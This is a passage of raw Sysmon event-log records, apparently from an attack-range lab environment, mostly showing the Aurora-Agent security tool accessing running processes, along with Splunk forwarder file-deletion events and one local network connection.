Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000048712Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:14.807{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E474-63C7-2706-00000000AF02}704C:\Program Files\Internet Explorer\iexplore.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000048711Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:14.806{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E317-63C7-ED05-00000000AF02}6268C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReaderUpdateService.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000048710Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:14.805{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5E05-00000000AF02}5280C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000048709Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:14.796{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5D05-00000000AF02}4176C:\Windows\system32\cmd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000048708Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:14.789{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000048707Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:14.722{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000048706Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:14.698{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000048705Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:14.691{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B504-00000000AF02}1332C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000048704Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:14.681{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B104-00000000AF02}5076C:\Windows\System32\rdpclip.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000048703Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:14.677{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF5-63C7-A404-00000000AF02}4616C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000048702Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:14.675{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF4-63C7-A104-00000000AF02}4952C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000048701Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:14.673{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA7E-63C7-F900-00000000AF02}4844C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000048700Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:14.670{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA75-63C7-F400-00000000AF02}2900C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000048699Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:14.668{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000048698Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:14.667{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AE00-00000000AF02}4912C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000048697Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:14.663{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000048696Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:14.662{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7500-00000000AF02}3048C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000048695Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:14.661{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7400-00000000AF02}3024C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000048694Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:14.660{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3E00-00000000AF02}3580C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000048693Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:14.658{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3B00-00000000AF02}3500C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 23542300x800000000000000048692Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:14.433{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB3BF575B9EEE770D9C621F3B1639B36,SHA256=0BA019E6A8A3F4B0F94A38A891B0C33461111D3BB419CAE45A016BFB360465B2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000048691Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:14.149{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2C00-00000000AF02}1648C:\Windows\System32\vds.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000048690Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:14.148{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2A00-00000000AF02}2844C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 23542300x800000000000000018999Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:15.448{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D7C041D14AB380EC65A6367074BFB3FD,SHA256=72B13C2032F68888A80DADD66F128F263317E7F7E8BBF701273603F03E4C5CDC,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000048720Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:12.715{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56521-false10.0.1.12-8000- 10341000x800000000000000048719Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:15.673{FE4C2B44-D9F5-63C7-0D00-00000000AF02}8927064C:\Windows\system32\svchost.exe{FE4C2B44-DDF7-63C7-B104-00000000AF02}5076C:\Windows\System32\rdpclip.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3ca94|c:\windows\system32\rpcss.dll+29447|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000048718Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:15.525{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=50948E875409A3659B23874235C81C63,SHA256=0559D3D3D830020EDAEE6B3BBA69EACC8CD607E617592791FD40AA333E39D121,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000048717Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:15.334{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E650-63C7-8906-00000000AF02}3796C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 23542300x800000000000000019001Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:16.550{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8067A3E6D8924F4137F70BC50595A671,SHA256=DDFE9AFD66BD76F328DB2F5AB91BCC5E58E1D98A35EEF2CFEFD0958840CDEA9F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019000Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:16.503{E5A8D418-DC43-63C7-1200-00000000B002}1012NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=ABED9B98AC4DF4FBFCFB29DC10D06183,SHA256=7FB121982296408E2C73344D156CE5E5C9E9C509E0C357CE1074FDC3EEE5F62F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000048760Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:16.843{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2159FB19CF2CB708ECD27584D0D1A75F,SHA256=B3D4CD8FB36B14C1790DEDA112ACF48FE0310F300F91638F113729807E769BEA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000048759Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:16.416{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66E-63C7-A306-00000000AF02}1712C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000048758Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:16.414{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66E-63C7-A206-00000000AF02}5460C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000048757Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:16.411{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66D-63C7-A106-00000000AF02}876C:\Program Files\Mozilla 